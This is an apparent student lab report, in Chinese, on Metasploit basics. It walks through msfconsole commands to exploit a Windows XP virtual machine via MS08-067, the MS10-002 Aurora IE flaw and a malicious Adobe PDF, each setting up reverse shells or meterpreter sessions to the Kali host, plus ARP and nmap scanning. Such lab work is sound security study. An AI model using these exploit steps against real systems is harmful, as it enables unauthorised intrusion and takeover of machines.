Exp5 MSF基礎應用 20154308張珊珊

1、基礎知識回答

  • 用本身的話解釋什麼是exploit,payload,encode
    • exploit:漏洞利用,與靶機進行交互,攻擊靶機的最後一步
    • payload:有效載荷,後面通常加要對靶機進行攻擊的代碼,能夠實現任何運行在受害者環境中的程序所能作的事情
    • encode:編碼器,對代碼進行異或運算、去除壞字符等等,保護payload不被發現shell

      2、實踐過程

  • 此次實驗是用同窗電腦作的,由於本身的電腦很差用,因此截圖裏面若是有別人的主機名稱之類的就忽略吧,端口號什麼的是本身的學號
  • win xp ip:192.168.120.135
  • kali ip:192.168.120.136windows

    1.Windows服務滲透攻擊——MS08-067安全漏洞

  • MS08-067漏洞將會影響除Windows Server 2008 Core之外的全部Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。
  • 咱們利用這個模塊進行主動攻擊。
  • 調用該模塊,而且查看可使用的payload
    use exploit/windows/smb/ms08_067_netapi show payloads
    api

  • set payload generic/shell_reverse_tcp設置payload,tcp反向回連
  • set LHOST 192.168.120.136 攻擊機kali ip
  • set LPORT 4308攻擊端口
  • set RHOST 192.168.120.135靶機winxp ip
  • set target 0自動選擇目標系統類型,匹配度較高
  • show options看一下配置是否都正確
  • exploit開始監聽。攻擊不成功,忘記截圖,盜了別人的一張圖,是如出一轍的錯誤。參照別人的博客,檢查了防火牆是關着的,端口是在監聽的,兩臺虛擬機也是能夠ping通的……
  • 而後我決定先作別的攻擊,一下子再如出一轍的步驟再來一次,結果就成功了。
  • 成功獲取win xp的系統權限
    瀏覽器

2.2 MS10_002_aurora漏洞攻擊

  • ms10_002颱風漏洞是IE瀏覽器漏洞,也是黑客掛馬利用的最熱門漏洞。
  • msf > use windows/browser/ms10_002_aurora調用該模塊
  • set payload windows/meterpreter/reverse_http設置http反向回連
  • 依舊是設置攻擊機ip、攻擊端口
  • set URIPATH 4308zss設置統一資源標識符路徑
  • 開始監聽
  • 成功生成一個URLhttp://192.168.120.136:8080/4308zss
  • 在win xp的IE瀏覽器中訪問該地址,顯示空白(要關掉xp上的殺毒軟件)
  • 回頭來看kali這邊已經攻擊成功了(見上上一張圖),ipconfig試一下

2.3 針對Adobe的攻擊

  • use exploit/mulit/fileformat/adobe_u3d_meshcont選用該模塊,可是好像用不了
  • use exploit/windows/fileformat/adobe_cooltype_sing換一個模塊
  • set payload windows/meterpreter/reverse_tcp設置tcp反向回連
  • show options查看要設置哪些東西
  • 根據要求設置好了,而後開始監聽
  • 接下來就要和以前左後門實驗同樣,把剛剛生成的pdf文件(在指定的路徑裏面找到)放到xp上,各類設置回連監聽啥的
  • 而後在xp上用Adobe Reader打開pdf,還沒等它顯示出來就截圖了
  • kali這邊攻擊成功,同樣的ipconfig

2.4 輔助模塊應用

  • 我選了arp_sweep模塊,這是一個能夠掃描端口、各類鏈接等等的模塊
  • use auxiliary/scanner/discovery/arp_sweep進入該模塊
  • show options查看要設置的東西
  • set interface eth0set RHOSTS 192.168.120.135設置靶機ip,set threads 2設置過程忘記截圖了
  • run開啓掃描,成功地掃描到靶機
  • namp 192.168.120.135開啓nmap掃描,能夠看見開啓的端口號,以及靶機的操做系統

3、離實戰還缺些什麼技術或步驟?

  • 怎麼去發現新的漏洞,此次實驗用的都是好久之前的漏洞了,對如今的系統去作這些攻擊確定是沒用的。發現新漏洞這個很賺錢啊,可是想一想就很難。
  • 還和以前的後門攻擊同樣,怎麼去保證攻擊機ip的穩定安全

    4、實踐總結

    此次的實驗操做起來蠻簡單,幾乎是如出一轍的操做步驟,讓我瞭解到msf的強大。
    經過此次實驗也讓我看到了漏洞竟是如此之多,之後要常打補丁,可能會有用吧tcp

相關文章
相關標籤/搜索